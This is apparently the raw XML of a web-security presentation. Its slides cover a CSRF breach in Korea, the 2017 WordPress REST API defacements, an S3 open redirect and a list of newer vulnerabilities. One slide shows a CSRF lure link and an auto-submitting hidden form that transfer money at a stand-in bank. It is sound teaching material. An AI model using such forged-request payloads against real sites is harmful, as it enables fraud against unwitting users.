              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Facebook had missed the step of checking user access permissions for the function to assign user role management, allowing this exploit to be possible.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1689066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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143499"/>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en-US" sz="6000" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Agenda.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3896897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lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="4000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko" sz="4000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="2500" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Incheon</a:t>
            </a:r>
            <a:endParaRPr lang="ko" sz="2500" dirty="0">
              <a:latin typeface="Malgun Gothic"/>
              <a:ea typeface="Malgun Gothic"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2942676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Shape 485"/>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2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7F46248-65F9-4BAC-AFAF-3DD0D19924C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671803" y="1125200"/>
            <a:ext cx="8089641" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Personal information from 17 million people was stolen from 225 websites and sold by three hackers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Why was this Significant?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A large amount of information was lost to a relatively trivial attack. Although an increasing number of web frameworks now have built-in solutions such as CSRF token generation and handling, there are still many CSRF vulnerabilities discovered regularly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>How does this relate to Cross-Site Request Forgery (CSRF)?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The attack was executed by inserting malicious links on forums, targeting the administrators of the websites. When clicked, the hackers obtained the session or credentials or the administrators, gaining access to the sites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http://koreajoongangdaily.joins.com/news/article/Article.aspx?aid=2985550</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1983217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Shape 485"/>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4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{984E818B-B405-42C4-8194-F6940A56AAA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718457" y="1353328"/>
            <a:ext cx="7949682" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>="https://insecurebanking.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>transfer?acct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Me&amp;amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>;=1000000"&gt;Win a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>iphone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>!&lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DC5AAB2-2E12-408D-A480-76015437C04A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="867747" y="2138827"/>
            <a:ext cx="7539135" cy="1600438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[0].submit()"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   &lt;form action="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> https://insecurebanking.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/transfer." method="POST"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     &lt;input type="hidden" name="acct" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Me </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     &lt;input type="hidden" name="amount" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> 1000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     &lt;input type="submit" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Win a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>iphone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   &lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;/body&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3856481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lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko" sz="4000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Using Components with Known Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="ko" sz="4000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko" sz="2500" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>WordPress REST API (Jan 2017)</a:t>
            </a:r>
            <a:endParaRPr lang="ko" sz="2500" dirty="0">
              <a:latin typeface="Malgun Gothic"/>
              <a:ea typeface="Malgun Gothic"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2246145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Shape 485"/>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2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EA1DD93-2972-4E48-A741-F217FEAA2F3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345989" y="384813"/>
            <a:ext cx="8612660" cy="3754874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>1.5 million web pages were defaced through an unauthenticated REST API flaw that allows malicious users to modify WordPress contents.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="medium-content-serif-font"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>Why was this Significant?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="medium-content-serif-font"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>In the normal course of software development, patching and enchantments are continuously released, with the exceptions of software at end-of-life. Part of this is fuelled by new vulnerabilities or exploits discovered.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>Many studies have been done showing that despite the publicity zero-day exploits get; many attacks come from old vulnerabilities. For example, the HPE Security Research Cyber Risk Report 2015 found that 44% of breaches come from vulnerabilities 2–4 years old.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>While some vulnerabilities can be mitigated by security settings, the benefits of updating these components often outweigh the cost, and the mitigation might not be as effective as the patch. For example, in this case, some web hosting companies had put in place firewall rules, but these were bypassed anyway.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="medium-content-serif-font"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>How does this relate to Using Components with Known Vulnerabilities?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="medium-content-serif-font"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>The actual vulnerability was not announced by WordPress until one week after it’s patch was released, to give them time to patch their WordPress instance. The number of affected webpages is a testament to the ineffectiveness of their efforts.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1129129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wordfence.com/wp-content/uploads/2017/02/REST-API-Attacks-Blocked-by-Wordfence-Premium.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2591FC96-8D0F-43CC-AB0F-AFFEB4B9C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31" y="273752"/>
            <a:ext cx="3916109" cy="39675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08A539-2B34-4396-9905-40404A2B9958}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7556276" y="4269522"/>
            <a:ext cx="1260281" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Wordfence.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4100" name="Picture 4" descr="https://www.wordfence.com/wp-content/uploads/2017/02/REST_API_Defaced_Pages_Totals-updated.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AECC85E-5039-4DD7-ABCE-30ACCA7CC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303" y="291314"/>
            <a:ext cx="4098254" cy="396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403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lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko" sz="4000" dirty="0" err="1">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko" sz="4000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t> Redirects and Forwards </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="ko" sz="4000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko" sz="2500" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Amazon Simple Storage Service (S3)</a:t>
            </a:r>
            <a:endParaRPr lang="ko" sz="2500" dirty="0">
              <a:latin typeface="Malgun Gothic"/>
              <a:ea typeface="Malgun Gothic"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="245315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Shape 485"/>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2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{712DB885-0E16-4243-95BC-5424733F4531}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="158496" y="694313"/>
            <a:ext cx="8753856" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>This flaw was discovered by the Zero Security Group, where a malicious user can redirect other users to his page of choice while disguised as a reputable link.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="medium-content-serif-font"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://s3.amazonaws.com/psiphon/landing-page-redirect/redirect.html?landingPage=https://google.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" i="1" dirty="0">
              <a:latin typeface="medium-content-serif-font"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="medium-content-serif-font"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>Why was this Significant?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="medium-content-serif-font"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t> redirects and forwards are among the easiest to exploit and spread. Attacks can be executed quickly and to a large audience.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="medium-content-serif-font"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>How does this relate to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t> Redirects and Forwards?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="medium-content-serif-font"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>As the page processes the address for redirection as a parameter in the URL and does not check for its validity, it can be easily modified to another address.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="683516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lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko" sz="4000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>New Threats Since Then</a:t>
            </a:r>
            <a:endParaRPr lang="ko" sz="2500" dirty="0">
              <a:latin typeface="Malgun Gothic"/>
              <a:ea typeface="Malgun Gothic"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="635699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9" name="Shape 499"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205979"/>
            <a:ext cx="8229600" cy="857400"/>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3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>New vulns in modern web apps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="Shape 500"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2956591" y="1270001"/>
            <a:ext cx="5730300" cy="456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501" name="Shape 501"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513325" y="1735025"/>
            <a:ext cx="8229600" cy="2587200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="1800" dirty="0"/>
              <a:t>Stateless API abuse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1800" dirty="0"/>
              <a:t>AngularJS template injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1800" dirty="0"/>
              <a:t>Server-site template injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1800" dirty="0"/>
              <a:t>Fomular injection (CSV injection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1800" dirty="0"/>
              <a:t>Java deserialization vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko"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Shape 325"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-414528"/>
            <a:ext cx="9144000" cy="1720800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
